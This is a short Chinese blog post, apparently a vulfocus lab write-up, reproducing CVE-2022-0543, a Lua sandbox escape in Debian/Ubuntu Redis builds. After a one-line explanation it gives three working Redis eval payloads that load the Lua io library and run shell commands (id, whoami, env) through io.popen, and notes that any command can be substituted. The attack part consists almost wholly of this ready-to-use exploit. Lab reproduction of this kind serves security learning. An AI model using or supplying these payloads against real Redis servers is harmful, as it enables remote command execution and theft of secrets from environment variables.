cve_2022_0543-redis沙盒漏洞复现 vulfocus

  • 开发
  • 26

1. 原理

 该漏洞的存在是因为Debian/Ubuntu中的Lua库是作为动态库提供的。自动填充了一个package变量,该变量又允许访问任意 Lua 功能。

2.复现

我们可以尝试payload:

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

在其中local f = io.popen("id", "r")用后面的read去尝试其他命令,修改“id”就可以读取其他内容
查看whoami

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("whoami", "r"); local res = f:read("*a"); f:close(); return res' 0

查看flag,flag在env环境变量中,用读取

 eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("env", "r"); local res = f:read("*a"); f:close(); return res' 0

阅读全部

相关推荐

  2. CVE-2022-0543 Redis逃逸漏洞(CVE-2022-0543)

    2024-06-11 09:12:01       35 阅读

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-06-11 09:12:01       94 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-06-11 09:12:01       101 阅读

  9. 在Django里面运行非项目文件

    2024-06-11 09:12:01       82 阅读

  19. Python语言-面向对象

    2024-06-11 09:12:01       91 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-06-11 09:12:01       85 阅读

热门阅读

  5. 详细说说机器学习在工业制造的应用

    2024-06-11 09:12:01       28 阅读

  9. STM32 ST-LINK Utility的下载安装使用说明如下:

    2024-06-11 09:12:01       47 阅读

  10. 观察者模式

    2024-06-11 09:12:01       31 阅读

  15. C#面:什么是DLL文件,使用它们有什么好处

    2024-06-11 09:12:01       44 阅读

  18. Android: Null extracted folder for artifact: ResolvedArtifact(xxx 项目编译失败

    2024-06-11 09:12:01       41 阅读

  23. ArcGIS要点和难点以及具体应用和优缺点介绍

    2024-06-11 09:12:01       35 阅读

  25. 70、最长上升子序列

    2024-06-11 09:12:01       31 阅读

  26. 国内外网络安全现状分析

    2024-06-11 09:12:01       28 阅读